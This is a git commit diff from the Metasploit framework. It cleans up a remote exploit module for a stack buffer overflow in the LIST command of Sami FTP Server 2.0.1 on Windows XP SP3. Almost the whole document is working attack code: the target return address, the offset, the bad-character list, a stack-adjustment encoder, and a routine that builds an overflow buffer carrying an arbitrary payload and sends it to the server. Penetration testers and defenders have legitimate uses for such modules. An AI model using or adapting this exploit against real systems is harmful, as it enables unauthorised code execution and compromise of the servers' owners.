Merge pull request #1 from jvazquez-r7/sami_ftp_work

dougsko · dougsko · commit 8611109ffd9f · 2013-03-19T12:12:20.000-07:00
cleanup for sami_ftpd_list
diff --git a/modules/exploits/windows/ftp/sami_ftpd_list.rb b/modules/exploits/windows/ftp/sami_ftpd_list.rb
@@ -8,16 +8,21 @@
 require 'msf/core'
 
 class Metasploit4 < Msf::Exploit::Remote
-	Rank = NormalRanking
+	Rank = AverageRanking
 
 	include Msf::Exploit::Remote::Ftp
 
 	def initialize(info = {})
 		super(update_info(info,
-			'Name'			 => 'Sami FTP Server 2.0.1 LIST Command Buffer Overflow',
+			'Name'			 => 'Sami FTP Server LIST Command Buffer Overflow',
 			'Description'	 => %q{
-					A buffer overflow is triggered when a long LIST
-				command is sent to the server while the user is viewing the Logs tab.
+					This module exploits a stack based buffer overflow on Sami FTP Server 2.0.1.
+				The vulnerability exists in the processing of LIST commands. In order to trigger
+				the vulnerability, the "Log" tab must be viewed in the Sami FTP Server managing
+				application, in the target machine. On the other hand, the source IP address used
+				to connect with the FTP Server is needed. If the user can't provide it, the module
+				will try to resolve it. This module has been tested successfully on Sami FTP Server
+				2.0.1 over Windows XP SP3.
 			},
 			'Platform'		 => 'win',
 			'Author'		 =>
@@ -29,47 +34,46 @@ def initialize(info = {})
 			'References'	 =>
 				[
 					[ 'OSVDB', '90815'],
-					[ 'EDB', '24557'],
+					[ 'EDB', '24557']
 				],
 			'Privileged'	 => false,
-			'DefaultOptions' =>
-					{
-						'EXITFUNC' => 'thread',
-					},
 			'Payload'		 =>
 				{
-					'Space'    => 900,
-					'BadChars' => "\x00\x0a\x0d\x20\xff",
-					'StackAdjustment' => -3500,
+					'Space'          => 1500,
+					'DisableNops'    => true,
+					'BadChars'       => "\x00\x0a\x0d\x20\x5c",
+					'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
 				},
 			'Targets'		 =>
 				[
-					[
-						'Windows XP',
+					[ 'Sami FTP Server 2.0.1 / Windows XP SP3',
 						{
-							'Ret' => 0x10028283, # jmp esp C:\Program Files\PMSystem\Temp\tmp0.dll
-							'Offset'   => 225,
-						},
+							'Ret' => 0x10028283, # jmp esp from C:\Program Files\PMSystem\Temp\tmp0.dll
+							'Offset'   => 228
+						}
 					],
 				],
 			'DefaultTarget' => 0,
 			'DisclosureDate' => 'Feb 27 2013'))
 		register_options(
 			[
-				OptString.new('IPADDR', [true, 'Attacker\'s IP address'])
+				OptAddress.new('SOURCEIP', [false, 'The local client address'])
 			], self.class)
 	end
 
 	def exploit
-		connect_login
-		sleep 1
-		
-		ip_length = datastore['IPADDR'].length - 3
-		buf = rand_text_alphanumeric(target['Offset'] - ip_length)
+		connect
+		if datastore['SOURCEIP']
+			ip_length = datastore['SOURCEIP'].length
+		else
+			ip_length = Rex::Socket.source_address(rhost).length
+		end
+		buf = rand_text(target['Offset'] - ip_length)
 		buf << [ target['Ret'] ].pack('V')
+		buf << rand_text(16)
 		buf << payload.encoded
-
 		send_cmd( ['LIST', buf], false )
 		disconnect
 	end
+
 end
